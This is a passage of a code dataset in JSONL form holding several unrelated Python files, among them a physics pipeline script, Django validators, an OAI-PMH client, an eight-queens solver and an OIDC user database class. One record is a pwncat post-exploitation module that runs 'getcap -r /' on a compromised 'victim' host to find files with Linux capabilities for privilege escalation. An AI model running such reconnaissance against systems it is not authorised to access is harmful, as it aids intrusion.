* ureg.deg, nh=42.3 * ureg.deg)\n YeO = dict(iron=0.4656, pyrolite=0.4957)\n\n # Instantiate with two pipelines: first has both nh/ih and iron/pyrolite\n # param selectors, while the second only has nh/ih param selectors.\n pipeline = Pipeline(\n \"tests/settings/test_Pipeline.cfg\"\n ) # pylint: disable=redefined-outer-name\n\n current_mat = \"iron\"\n current_hier = \"nh\"\n\n for new_hier, new_mat in product(hierarchies, materials):\n _ = YeO[new_mat]\n\n assert pipeline.param_selections == sorted([current_hier, current_mat]), str(\n pipeline.params.param_selections\n )\n assert pipeline.params.theta23.value == t23[current_hier], str(\n pipeline.params.theta23\n )\n assert pipeline.params.YeO.value == YeO[current_mat], str(pipeline.params.YeO)\n\n # Select just the hierarchy\n pipeline.select_params(new_hier)\n assert pipeline.param_selections == sorted([new_hier, current_mat]), str(\n pipeline.param_selections\n )\n assert pipeline.params.theta23.value == t23[new_hier], str(\n pipeline.params.theta23\n )\n assert pipeline.params.YeO.value == YeO[current_mat], str(pipeline.params.YeO)\n\n # Select just the material\n pipeline.select_params(new_mat)\n assert pipeline.param_selections == sorted([new_hier, new_mat]), str(\n pipeline.param_selections\n )\n assert pipeline.params.theta23.value == t23[new_hier], str(\n pipeline.params.theta23\n )\n assert pipeline.params.YeO.value == YeO[new_mat], str(pipeline.params.YeO)\n\n # Reset both to \"current\"\n pipeline.select_params([current_mat, current_hier])\n assert pipeline.param_selections == sorted([current_hier, current_mat]), str(\n pipeline.param_selections\n )\n assert pipeline.params.theta23.value == t23[current_hier], str(\n pipeline.params.theta23\n )\n assert pipeline.params.YeO.value == YeO[current_mat], str(pipeline.params.YeO)\n\n # Select both hierarchy and material\n pipeline.select_params([new_mat, new_hier])\n assert pipeline.param_selections == sorted([new_hier, new_mat]), str(\n pipeline.param_selections\n )\n assert pipeline.params.theta23.value == t23[new_hier], str(\n pipeline.params.theta23\n )\n assert pipeline.params.YeO.value == YeO[new_mat], str(pipeline.params.YeO)\n\n current_hier = new_hier\n current_mat = new_mat\n\n\ndef parse_args():\n \"\"\"Parse command line arguments if `pipeline.py` is called as a script.\"\"\"\n parser = ArgumentParser(\n # formatter_class=ArgumentDefaultsHelpFormatter,\n description=\"\"\"Instantiate and run a pipeline from a config file.\n Optionally store the resulting distribution(s) and plot(s) to disk.\"\"\"\n )\n\n required = parser.add_argument_group(\"required arguments\")\n required.add_argument(\n \"-p\",\n \"--pipeline\",\n metavar=\"CONFIGFILE\",\n type=str,\n required=True,\n help=\"File containing settings for the pipeline.\",\n )\n\n parser.add_argument(\n \"-a\",\n \"--arg\",\n metavar=\"SECTION ARG=VAL\",\n nargs=\"+\",\n action=\"append\",\n help=\"\"\"Set config arg(s) manually. SECTION can be e.g.\n \"stage:\" (like \"stage:flux\", \"stage:reco\", etc.),\n \"pipeline\", and so forth. Arg values specified here take precedence\n over those in the config file, but note that the sections specified\n must already exist in the config file.\"\"\",\n )\n parser.add_argument(\n \"--select\",\n metavar=\"PARAM_SELECTIONS\",\n nargs=\"+\",\n default=None,\n help=\"\"\"Param selectors (separated by spaces) to use to override any\n defaults in the config file.\"\"\",\n )\n parser.add_argument(\n \"--inputs\",\n metavar=\"FILE\",\n type=str,\n help=\"\"\"File from which to read inputs to be fed to the pipeline.\"\"\",\n )\n parser.add_argument(\n \"--only-stage\",\n metavar=\"STAGE\",\n type=str,\n help=\"\"\"Test stage: Instantiate a single stage in the pipeline\n specification and run it in isolation (as the sole stage in a\n pipeline). If it is a stage that requires inputs, these can be\n specified with the --infile argument, or else dummy stage input maps\n (numpy.ones(...), matching the input binning specification) are\n generated for testing purposes.\"\"\",\n )\n parser.add_argument(\n \"--stop-after-stage\",\n metavar=\"STAGE\",\n help=\"\"\"Instantiate a pipeline up to and including STAGE, but stop\n there. Can specify a stage by index in the pipeline config (e.g., 0, 1,\n etc.) or name (e.g., flux, osc, etc.)\"\"\",\n )\n parser.add_argument(\n \"--outdir\",\n metavar=\"DIR\",\n type=str,\n help=\"\"\"Store all output files (data and plots) to this directory.\n Directory will be created (including missing parent directories) if it\n does not exist already. If no dir is provided, no outputs will be\n saved.\"\"\",\n )\n parser.add_argument(\n \"--intermediate\",\n action=\"store_true\",\n help=\"\"\"Store all intermediate outputs, not just the final stage's\n outputs.\"\"\",\n )\n parser.add_argument(\n \"--transforms\",\n action=\"store_true\",\n help=\"\"\"Store all transforms (for stages that use transforms).\"\"\",\n )\n # TODO: optionally store the transform sets from each stage\n # parser.add_argument(\n # '-T', '--transform-file', metavar='FILE', type=str,\n # help='''File into which to store transform(s) from the pipeline.'''\n # )\n parser.add_argument(\"--pdf\", action=\"store_true\", help=\"\"\"Produce pdf plot(s).\"\"\")\n parser.add_argument(\"--png\", action=\"store_true\", help=\"\"\"Produce png plot(s).\"\"\")\n parser.add_argument(\n \"--annotate\", action=\"store_true\", help=\"\"\"Annotate plots with counts per bin\"\"\"\n )\n parser.add_argument(\n \"-v\",\n action=\"count\",\n default=None,\n help=\"\"\"Set verbosity level. Repeat for increased verbosity. -v is\n info-level, -vv is debug-level and -vvv is trace-level output.\"\"\",\n )\n args = parser.parse_args()\n return args\n\n\ndef main(return_outputs=False):\n \"\"\"Run unit tests if `pipeline.py` is called as a script.\"\"\"\n from pisa.utils.plotter import Plotter\n\n args = parse_args()\n set_verbosity(args.v)\n\n # Even if user specifies an integer on command line, it comes in as a\n # string. Try to convert to int (e.g. if `'1'` is passed to indicate the\n # second stage), and -- if successful -- use this as `args.only_stage`.\n # Otherwise, the string value passed will be used (e.g. `'osc'` could be\n # passed).\n try:\n only_stage_int = int(args.only_stage)\n except (ValueError, TypeError):\n pass\n else:\n args.only_stage = only_stage_int\n\n if args.outdir:\n mkdir(args.outdir)\n else:\n if args.pdf or args.png:\n raise ValueError(\"No --outdir provided, so cannot save images.\")\n\n # Most basic parsing of the pipeline config (parsing only to this level\n # allows for simple strings to be specified as args for updating)\n bcp = PISAConfigParser()\n bcp.read(args.pipeline)\n\n # Update the config with any args specified on command line\n if args.arg is not None:\n for arg_list in args.arg:\n if len(arg_list) < 2:\n raise ValueError(\n 'Args must be formatted as: \"section arg=val\". Got \"%s\"'\n \" instead.\" % \" \".join(arg_list)\n )\n section = arg_list[0]\n remainder = \" \".join(arg_list[1:])\n eq_split = remainder.split(\"=\")\n newarg = eq_split[0].strip()\n value = (\"=\".join(eq_split[1:])).strip()\n logging.debug(\n 'Setting config section \"%s\" arg \"%s\" = \"%s\"', section, newarg, value\n )\n try:\n bcp.set(section, newarg, value)\n except NoSectionError:\n logging.error(\n 'Invalid section \"%s\" specified. Must be one of %s',\n section,\n bcp.sections(),\n )\n raise\n\n # Instantiate the pipeline\n pipeline = Pipeline(bcp) # pylint: disable=redefined-outer-name\n\n if args.select is not None:\n pipeline.select_params(args.select, error_on_missing=True)\n\n if args.only_stage is None:\n stop_idx = args.stop_after_stage\n try:\n stop_idx = int(stop_idx)\n except (TypeError, ValueError):\n pass\n if isinstance(stop_idx, str):\n stop_idx = pipeline.index(stop_idx)\n outputs = pipeline.get_outputs(\n idx=stop_idx\n ) # pylint: disable=redefined-outer-name\n if stop_idx is not None:\n stop_idx += 1\n indices = slice(0, stop_idx)\n else:\n assert args.stop_after_stage is None\n idx = pipeline.index(args.only_stage)\n stage = pipeline[idx]\n indices = slice(idx, idx + 1)\n\n # Create dummy inputs if necessary\n inputs = None\n if hasattr(stage, \"input_binning\"):\n logging.warning(\n \"Stage requires input, so building dummy\"\n \" inputs of random numbers, with random state set to the input\"\n \" index according to alphabetical ordering of input names and\"\n \" filled in alphabetical ordering of dimension names.\"\n )\n input_maps = []\n tmp = deepcopy(stage.input_binning)\n alphabetical_binning = tmp.reorder_dimensions(sorted(tmp.names))\n for input_num, input_name in enumerate(sorted(stage.input_names)):\n # Create a new map with all 3's; name according to the input\n hist = np.full(shape=alphabetical_binning.shape, fill_value=3.0)\n input_map = Map(\n name=input_name, binning=alphabetical_binning, hist=hist\n )\n\n # Apply Poisson fluctuations to randomize the values in the map\n input_map.fluctuate(method=\"poisson\", random_state=input_num)\n\n # Reorder dimensions according to user's original binning spec\n input_map.reorder_dimensions(stage.input_binning)\n input_maps.append(input_map)\n inputs = MapSet(maps=input_maps, name=\"ones\", hash=1)\n\n outputs = stage.run(inputs=inputs)\n\n for stage in pipeline[indices]:\n if not args.outdir:\n break\n stg_svc = stage.stage_name + \"__\" + stage.service_name\n fbase = os.path.join(args.outdir, stg_svc)\n if args.intermediate or stage == pipeline[indices][-1]:\n stage.outputs.to_json(fbase + \"__output.json.bz2\")\n if args.transforms and stage.use_transforms:\n stage.transforms.to_json(fbase + \"__transforms.json.bz2\")\n\n # also only plot if args intermediate or last stage\n if args.intermediate or stage == pipeline[indices][-1]:\n formats = OrderedDict(png=args.png, pdf=args.pdf)\n if isinstance(stage.outputs, Data):\n # TODO(shivesh): plots made here will use the most recent\n # \"pisa_weight\" column and so all stages will have identical plots\n # (one workaround is to turn on \"memcache_deepcopy\")\n # TODO(shivesh): intermediate stages have no output binning\n if stage.output_binning is None:\n logging.debug(\"Skipping plot of intermediate stage %s\", stage)\n continue\n outputs = stage.outputs.histogram_set(\n binning=stage.output_binning,\n nu_weights_col=\"pisa_weight\",\n mu_weights_col=\"pisa_weight\",\n noise_weights_col=\"pisa_weight\",\n mapset_name=stg_svc,\n errors=True,\n )\n elif isinstance(stage.outputs, (MapSet, TransformSet)):\n outputs = stage.outputs\n\n try:\n for fmt, enabled in formats.items():\n if not enabled:\n continue\n my_plotter = Plotter(\n stamp=\"Event rate\",\n outdir=args.outdir,\n fmt=fmt,\n log=False,\n annotate=args.annotate,\n )\n my_plotter.ratio = True\n my_plotter.plot_2d_array(\n outputs, fname=stg_svc + \"__output\", cmap=\"RdBu\"\n )\n except ValueError as exc:\n logging.error(\n \"Failed to save plot to format %s. See exception\" \" message below\",\n fmt,\n )\n traceback.format_exc()\n logging.exception(exc)\n logging.warning(\"I can't go on, I'll go on.\")\n\n if return_outputs:\n return pipeline, outputs\n\n\nif __name__ == \"__main__\":\n pipeline, outputs = main(return_outputs=True) # pylint: disable=invalid-name\n","sub_path":"pisa/core/pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":29978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"95589715","text":"#!/usr/bin/env python3\nimport dataclasses\nfrom typing import Generator, List\n\nfrom colorama import Fore\n\nimport pwncat\nfrom pwncat.enumerate import FactData\n\nname = \"pwncat.enumerate.capabilities\"\nprovides = \"file.caps\"\nper_user = True\nalways_run = False\n\n\n@dataclasses.dataclass\nclass FileCapabilityData(FactData):\n\n path: str\n \"\"\" The path to the file \"\"\"\n caps: List[str]\n \"\"\" List of strings representing the capabilities (e.g. \"cap_net_raw+ep\") \"\"\"\n\n def __str__(self):\n line = f\"[cyan]{self.path}[/cyan] -> [[\"\n line += \",\".join(f\"[blue]{c}[/blue]\" for c in self.caps)\n line += \"]]\"\n return line\n\n\ndef enumerate() -> Generator[FactData, None, None]:\n \"\"\"\n Enumerate executables with assigned capabilities\n\n :return: generator of FileCapability data\n \"\"\"\n\n if pwncat.victim.which(\"getcap\") is None:\n return\n\n with pwncat.victim.subprocess(f\"getcap -r / 2>/dev/null\", \"r\") as filp:\n for line in filp:\n line = line.strip().decode(\"utf-8\")\n # I don't know why this would happen, but just in case\n if \" = \" not in line:\n continue\n\n filename, caps = [x.strip() for x in line.split(\" = \")]\n caps = caps.split(\",\")\n\n yield FileCapabilityData(filename, caps)\n","sub_path":"pwncat/enumerate/capabilities.py","file_name":"capabilities.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"246642900","text":"import re\n\nfrom django.conf import settings\nfrom django.core.exceptions import ValidationError\nfrom django.utils.translation import ugettext as _\n\nfrom Chat.utils.error_messages import POSITIVE_INTEGER_MESSAGE, MAX_COUNT_MESSAGE, MESSAGES_TYPES_MESSAGE, \\\n EMPTY_TEXT_MESSAGE, TEXT_PARAM_MESSAGE\n\nVALID_COUNT_REGEX = r'^[1-9]\\d*$'\nVALID_MESSAGES_TYPES = ['read', 'unread']\n\n\ndef validate_count(count):\n if count is not None:\n if not re.search(VALID_COUNT_REGEX, count):\n raise ValidationError(_(POSITIVE_INTEGER_MESSAGE))\n max_count = settings.CHAT_CONFIGURATION['max_messages_count']\n if int(count) > int(max_count):\n raise ValidationError(_(MAX_COUNT_MESSAGE.format(max_count)))\n\n\ndef validate_messages_type(messages_type):\n if messages_type not in VALID_MESSAGES_TYPES:\n raise ValidationError(_(MESSAGES_TYPES_MESSAGE))\n\n\ndef validate_message_text(text):\n if not text:\n raise ValidationError(_(EMPTY_TEXT_MESSAGE))\n\n\ndef validate_request_data(data):\n if data is None or 'text' not in data.keys():\n raise ValidationError(_(TEXT_PARAM_MESSAGE))\n","sub_path":"Chat/utils/validators.py","file_name":"validators.py","file_ext":"py","file_size_in_byte":1125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"246766327","text":"import sqlite3, os\nfrom sqlite3 import Error\n\nclass DatabaseSetup():\n\tdef __init__(self):\n\t\tself.conn = sqlite3.connect(self.create_database())\n\t\tself.cursor = self.conn.cursor()\n\n\n\tdef create_database(self):\n\t\ttry:\n\t\t\tfile = 'wmconfig.db'\n\t\t\tdir = '/var/lib/wmconfig'\n\t\t\tif not os.path.exists(dir):\n\t\t\t\tos.makedirs(dir)\n\t\t\tfile = dir + '/' + file\n\n\t\t\tconn = sqlite3.connect(file)\n\t\texcept Error as e:\n\t\t\tprint(e)\n\t\tfinally:\n\t\t\tif conn:\n\t\t\t\tconn.close()\n\t\treturn file\n\n\n\tdef create_tables(self):\n\t\tdef drop_table(name):\n\t\t\ttry:\n\t\t\t\tstatement = \"DROP TABLE IF EXISTS {};\".format(name)\n\t\t\t\tself.cursor.execute(statement)\n\t\t\t\tself.conn.commit()\n\t\t\texcept Error as e:\n\t\t\t\tprint(e)\n\n\n\t\tdef create_file_table():\n\t\t\ttry:\n\t\t\t\tdrop_table('FILES')\n\t\t\t\tstatement = '''CREATE TABLE IF NOT EXISTS FILES (\n \t PATH TEXT PRIMARY KEY NOT NULL,\n\t\t\t\t\t\tCONTENT BLOB NOT NULL\n \t);\n\t\t\t\t\t'''\n\t\t\t\tself.cursor.execute(statement)\n\t\t\t\tself.conn.commit()\n\t\t\texcept Error as e:\n\t\t\t\tprint(e)\n\n\t\tcreate_file_table()\n","sub_path":"backend/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":1054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"32123806","text":"import zipfly\n\n# Efficient way to read a single very large binary file in python\n\nfile_location = '/home/user/Documents/file-100-GB.csv'\n\ngo_to_streaming = zipfly.from_one_file( file_location )\n\nprint ( go_to_streaming )\n# ","sub_path":"examples/one_file_response.py","file_name":"one_file_response.py","file_ext":"py","file_size_in_byte":273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"214998605","text":"from django import template\nfrom course_requests.models import CourseTaken, CourseGiven\nregister = template.Library()\n\n@register.filter\ndef request_notifications(i):\n taken_ones = CourseTaken.objects.all().count()\n given_ones = CourseGiven.objects.all().count()\n notification = taken_ones + given_ones\n return notification","sub_path":"course_requests/templatetags/request_notifications.py","file_name":"request_notifications.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"495501679","text":"import sys\nimport re\n\n\nclass Configuration:\n\n def __init__(self):\n self.server_name = \"Aache\"\n self.server_version = 1.0\n self.config_folder = \"/home/alexis/.papache/\"\n self.config = {}\n self.mime = {}\n self.read_config_file()\n self.read_mime_file()\n\n def read_mime_file(self):\n url = \"{}mime.conf\".format(self.config_folder)\n try:\n file = open(url, \"r\")\n lines = file.readlines()\n for line in lines:\n ext, mime = self.parse_mime_line(line)\n self.mime[ext] = mime\n except FileNotFoundError:\n sys.stderr(\"/!\\\\ Mime file not found\")\n quit(-1)\n\n def read_config_file(self):\n url = \"{}papache.conf\".format(self.config_folder)\n try:\n file = open(url, \"r\")\n lines = file.readlines()\n for line in lines:\n config_name, result = self.parse_config_line(line)\n self.config[config_name] = result\n except FileNotFoundError:\n sys.stderr(\"/!\\\\ Configuration file not found\")\n quit(-1)\n\n @staticmethod\n def parse_config_line(line):\n matched = re.search(\"^(.+)(?=\\s=\\s)\", line)\n config_name = matched.group(0)\n matched = re.search(\"(\\\"([^\\\"]|\\\"\\\")*\\\")\", line)\n result = matched.group(0)\n result = result.replace(\"\\\"\", \"\")\n return config_name, result\n\n @staticmethod\n def parse_mime_line(line):\n matched = re.search(\"\\t(.+)$\", line)\n mime = matched.group(0)\n mime = mime.replace(\"\\t\",\"\")\n matched = re.search(\"^(.+)\\t\", line)\n extension = matched.group(0)\n extension = extension.replace(\"\\t\", \"\")\n return extension, mime\n\n def get(self, config):\n s = self.config.get(config)\n return s\n\n def get_mime(self, extension):\n s = self.mime.get(extension)\n if s is None:\n s = \"application/octet-stream\"\n return s\n\n @staticmethod\n def file_is_text(mime):\n if mime is None:\n b = False\n elif \"text\" in mime:\n b = True\n else:\n b = False\n return b\n\n def get_error_html(self, code):\n try:\n file = open(\"{}{}.html\".format(self.config_folder, code), \"r\")\n result = file.read()\n except FileNotFoundError:\n result = \"

    Error - System File Not Found

    \" \\\n \"There is a problem with needed files. Just relax, your error code is {}\".format(code)\n return result\n\n def get_server_name(self):\n return self.server_name\n\n def get_server_version(self):\n return self.server_version\n","sub_path":"config_file.py","file_name":"config_file.py","file_ext":"py","file_size_in_byte":2729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"207736561","text":"import json\nimport joblib\nimport numpy as np\n\nwith open(\"/model/files/outlier_detector.joblib\", \"rb\") as fp:\n od_model = joblib.load(fp)\n\nwith open(\"/model/files/fields_config.json\", \"r\") as fp:\n config = json.load(fp)\n\nFIELDS = config['field_names']\n\ndef predict(**kwargs):\n x = np.array([kwargs.get(field_name) for field_name in FIELDS], dtype=float)\n score = od_model.predict_proba(x.reshape(1, -1), method='unify')[:, 1]\n return {\"value\": score.item()}\n","sub_path":"hydro_auto_od/resources/monitoring_model_template/src/func_main.py","file_name":"func_main.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"348947299","text":"import app\nimport flask\n\npage = flask.Blueprint('root', __name__)\n\n@page.route('/')\ndef index():\n key = \"conferences.lang.\" + flask.g.lang\n\n conferences = app.cache.get(key)\n if not conferences:\n conferences = app.api.list_conference(lang=flask.g.lang)\n if conferences is None:\n return app.api.last_error(), 500\n app.cache.set(key, conferences, 600)\n\n return flask.render_template('index.tpl',\n pagetitle='top',\n conferences=conferences\n )\n\n# Note: this has to come BEFORE other handlers\n@page.route('/favicon.ico')\ndef favicon():\n flask.abort(404)\n\n@page.route('/beacon')\ndef beacon():\n return flask.render_template('beacon.tpl')\n\n\n","sub_path":"blueprints/root.py","file_name":"root.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"120353224","text":"from oaipmh.client import Client\nfrom oaipmh.metadata import MetadataRegistry, oai_dc_reader\n\nBASE_URL = 'http://eprints.upnjatim.ac.id/cgi/oai2'\n\nDC_FIELDS_NAMES = [\n 'title',\n 'creator',\n 'subject',\n 'description',\n 'publisher',\n 'contributor',\n 'date',\n 'type',\n 'format',\n 'identifier',\n 'source',\n 'language',\n 'relation',\n 'coverage',\n 'rights'\n]\n\nregistry = MetadataRegistry()\nregistry.registerReader('oai_dc', oai_dc_reader)\nclient = Client(BASE_URL, registry)\n\nrecord = client.getRecord(metadataPrefix='oai_dc', identifier='oai:generic.eprints.org:14')\nmetadata = record[1]\n\nfor field_name in DC_FIELDS_NAMES:\n print(f'{field_name[0].upper()}{field_name[1:]}:')\n for field_value in metadata.getField(field_name):\n print(f' - {field_value}')\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"27915435","text":"def check(arr, dp):\r\n\tfor x in range(0, dp, 1):\r\n\t\tif (p[x] == p[dp]) or (p[x]+(dp-x)==p[dp]) or (p[x]-(dp-x)==p[dp]):\r\n\t\t\treturn -1\r\n\treturn 1\r\n\r\ndef stepnext(arr, dp):\r\n\tif arr[dp] == 8 and (dp == 1) and (arr[0]==8):\r\n\t\treturn -1\r\n\tfor x in range (dp+1, 8, 1):\r\n\t\tp[x] = 1\r\n\tp[dp] = p[dp] + 1\r\n\tfor x in range (dp, -1, -1):\r\n\t\tif p[x] == 9:\r\n\t\t\tp[x] = 1\r\n\t\t\tp[x-1] = p[x-1] + 1\r\n\t\telse:\r\n\t\t\treturn x\r\n\r\ndef xprint(arr):\r\n\tfor x in range(0, 8, 1):\r\n\t\tk = [0, 0, 0, 0, 0, 0, 0, 0]\r\n\t\tk[arr[x]-1] = 1\r\n\t\tprint (k)\r\n\tprint (\"\\n\")\r\n\r\nprint (\"start!!!!\")\r\n# the main starts from here\r\np = [1, 1, 1, 1, 1, 1, 1, 1]\r\nsolution = 0\r\ndeep = 0\r\n\t\r\n#main loop\r\nwhile True:\r\n\t#print (p)\r\n\tif 1 == check(p, deep): #can put it!\r\n\t\tif deep == 7:\r\n\t\t\t#print (\"good! we found a solution\")\r\n\t\t\txprint (p)\r\n\t\t\tsolution = solution + 1\r\n\t\t\tdeep = stepnext(p, deep)\r\n\t\t\tif deep == -1:\r\n\t\t\t\tbreak\r\n\t\telse:\r\n\t\t\tdeep = deep + 1\r\n\telse:\r\n\t\tdeep = stepnext(p, deep)\r\n\t\tif deep == -1:\r\n\t\t\tbreak\r\n\r\nprint(\"solution = \", solution)\r\n","sub_path":"algorithm_practice/8queen/test1.py","file_name":"test1.py","file_ext":"py","file_size_in_byte":1002,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"330686727","text":"import vk_api\nfrom tqdm import tqdm\n\n\ndef fetch_all_upcoming_events(vk_session, country_id, city_id):\n vk = vk_session.get_api()\n return vk.groups.search(q=' ', type='event', country_id=country_id, city_id=city_id, future=True, count=1000)['items']\n\n\ndef fetch_events_members(vk_session, events, verbose=False):\n vk = vk_session.get_api()\n tools = vk_api.VkTools(vk)\n\n members = dict()\n\n if verbose:\n events = tqdm(events)\n for event in events:\n event_members = tools.get_all('groups.getMembers', max_count=1000,\n values=dict(group_id=event['id']))['items']\n unsure_event_members = tools.get_all('groups.getMembers', max_count=1000,\n values=dict(group_id=event['id'], filter='unsure'))['items']\n\n members[event['id']] = dict()\n members[event['id']]['sure'] = event_members\n members[event['id']]['unsure'] = unsure_event_members\n\n return members\n\n\ndef fetch_events_walls(vk_session, events, verbose=False):\n vk = vk_session.get_api()\n\n texts = dict()\n\n if verbose:\n events = tqdm(events)\n for event in events:\n try:\n wall = vk.wall.get(owner_id=-int(event['id']), filter='owner', count=100)['items']\n texts[event['id']] = []\n for post in wall:\n texts[event['id']].append(post.get('text', ''))\n texts[event['id']].append(post.get('copy_history', [{}])[0].get('text', ''))\n except:\n pass\n\n return texts\n\n","sub_path":"recomendations/fetchers/events.py","file_name":"events.py","file_ext":"py","file_size_in_byte":1558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"550480042","text":"# -*-coding:utf8 -*-\n\n# 有个目录,里面是你自己写过的程序,统计一下你写过多少行代码。包括空行和注释,但是要分别列出来\n\nimport glob\n\ndef analyze_program(file_name):\n\tline_count = 0\n\tcomment_flag = False\n\tspace_line_count = 0\n\tcomment_line_count = 0\n\twith open(filename, 'rb') as file:\n\t\tfor line in file:\n\t\t\tline_count += 1\n\t\t\tif not line.strip(): space_line_count += 1\n\t\t\telif line.startswith(b'#'): comment_line_count += 1\n\t\t\telif line.startswith(b\"'''\") or line.startswith(b'\"\"\"'):\n\t\t\t\tcomment_flag = not comment_flag\n\t\t\t\tif comment_flag: comment_line_count += 1\n\t\tprint('file %s has %d lines:'%(filename,line_count))\n\t\tprint('%d space lines'%space_line_count)\n\t\tprint('%d comment_lines\\n'%comment_line_count)\n\nif __name__ == '__main__':\n\tfor filename in glob.glob(\"*.py\"):\n\t\tanalyze_program(filename)","sub_path":"0007/0007.py","file_name":"0007.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"189479800","text":"from ssixa.base.database.basedb import SSIXADBBase\nfrom ssixa.base.database.oidcdbobject import OIDCUser, OIDCAttribute\n\nfrom oic.utils.userinfo import UserInfo\n\nimport logging\nlog = logging.getLogger(__name__)\n\n\nclass UserInfoDB(UserInfo, SSIXADBBase):\n\n def __init__(self, db, instance=None):\n UserInfo.__init__(self)\n SSIXADBBase.__init__(self, db)\n self.instance = instance\n\n def __call__(self, userid, client_id, user_info_claims=None, **kwargs):\n try:\n return self.filter(self[userid], user_info_claims)\n except KeyError:\n return {}\n\n def add_claims(self, uid, claims, client=None):\n log.debug(\"Uid: \" + str(uid))\n log.debug(\"Claims: \" + str(claims))\n assert isinstance(claims, dict)\n s = None\n\n try:\n s = self.get_session()\n users = s.query(OIDCUser).filter(OIDCUser.username == uid).all()\n if users is not None and len(users) == 1:\n for c in claims:\n found = False\n for oidc_a in users[0].attributes:\n if c == oidc_a.attribute:\n oidc_a.value = c\n found = True\n if not found:\n users[0].attributes.append(OIDCAttribute(c,claims[c]))\n s.add(users[0])\n else:\n u = OIDCUser.fromDict(uid, claims, instance=self.instance)\n s.add(u)\n s.commit()\n except Exception as e:\n log.exception(\"Database commit failed\")\n finally:\n if s is not None:\n s.close()\n\n if client is not None:\n self.add_client_id_to_uid(uid, client)\n\n def remove_claims(self, uid, claims):\n log.debug(\"Uid: \" + str(uid))\n log.debug(\"Claims: \" + str(claims))\n assert isinstance(claims, dict)\n s = None\n\n try:\n s = self.get_session()\n users = s.query(OIDCUser).filter(OIDCUser.username == uid).all()\n if users is not None and len(users) == 1:\n for c in claims:\n users[0].attributes.remove(OIDCAttribute(c, claims[c]))\n s.add(users[0])\n s.commit()\n except Exception as e:\n log.exception(\"Database commit failed\")\n finally:\n if s is not None:\n s.close()\n\n def uid_for_client_id_exist(self, userid, client_id):\n log.debug(\"User Id: \" + str(userid))\n log.debug(\"Client Id: \" + str(client_id))\n assert userid is not None\n assert client_id is not None\n\n s = None\n count = 0\n try:\n s = self.get_session()\n users = s.query(OIDCUser).filter(OIDCUser.username == userid).all()\n if users is not None and len(users) > 0:\n for cid in users[0].client_id.split(','):\n if cid == client_id:\n count = count + 1\n except Exception as e:\n log.exception(\"Database query failed\")\n finally:\n if s is not None:\n s.close()\n\n if count > 0:\n log.debug(\"Result True\")\n return True\n else:\n log.debug(\"Result False\")\n return False\n\n def add_client_id_to_uid(self, uid, client_id):\n log.debug(\"Uid: \" + str(uid))\n log.debug(\"Client Id: \" + str(client_id))\n s = None\n\n try:\n s = self.get_session()\n users = s.query(OIDCUser).filter(OIDCUser.username == uid).all()\n if users is not None and len(users) == 1:\n cid = users[0].client_id\n if (cid is None) or (client_id not in cid.split(',')):\n if cid is None:\n cid = client_id\n else:\n cid = cid + \",\" + client_id\n users[0].client_id = cid\n s.add(users[0])\n s.commit()\n except Exception as e:\n log.exception(\"Database commit failed\")\n finally:\n if s is not None:\n s.close()\n\n def remove_client_id_from_uid(self, uid, client_id):\n log.debug(\"Uid: \" + str(uid))\n log.debug(\"Client Id: \" + str(client_id))\n s = None\n\n try:\n s = self.get_session()\n users = s.query(OIDCUser).filter(OIDCUser.username == uid).all()\n if users is not None and len(users) == 1:\n cid = users[0].client_id\n if cid is not None:\n if (client_id + ',') in cid:\n cid = cid.replace(client_id + ',','')\n else:\n cid = cid.replace(client_id, '')\n users[0].client_id = cid\n s.add(users[0])\n s.commit()\n except Exception as e:\n log.exception(\"Database commit failed\")\n finally:\n if s is not None:\n s.close()\n\n def cleanup(self):\n log.debug(\"Database cleanup\")\n s = None\n try:\n s = self.get_session()\n users = s.query(OIDCUser).filter(OIDCUser.instance == self.instance).all()\n for u in users:\n for a in u.attributes:\n s.delete(a)\n s.delete(u)\n s.commit()\n except Exception as e:\n log.exception(\"Database commit failed\")\n finally:\n if s is not None:\n s.close()\n\n def __getitem__(self, key):\n log.debug(\"Key: \" + str(key))\n s = None\n users = None\n item = None\n\n try:\n s = self.get_session()\n users = s.query(OIDCUser).filter(OIDCUser.username == key).all()\n if users is not None and len(users) == 1:\n item = users[0].toDict()\n else:\n log.error(\"User not found.\")\n except Exception as e:\n log.exception(\"Database query failed\")\n finally:\n if s is not None:\n s.close()\n\n log.debug(item)\n return item\n\n def __setitem__(self, key, value):\n log.debug(\"Key: \" + str(key))\n log.debug(\"Value: \" + str(value))\n assert key is not None\n assert isinstance(value, dict)\n\n # Set key with value and check if item already exists\n s = None\n try:\n s = self.get_session()\n ex_user = s.query(OIDCUser).filter(OIDCUser.username == key).all()\n if len(ex_user) > 0:\n user = ex_user[0]\n user.attributes = OIDCAttribute.fromDictToListofOIDCAttributes(value)\n else:\n user = OIDCUser.fromDict(key, value, instance=self.instance)\n s.add(user)\n s.commit()\n except Exception as e:\n log.exception(\"Database commit failed\")\n finally:\n if s is not None:\n s.close()\n\n def __delitem__(self, key):\n log.debug(\"Key: \" + str(key))\n # Remove key from database.\n 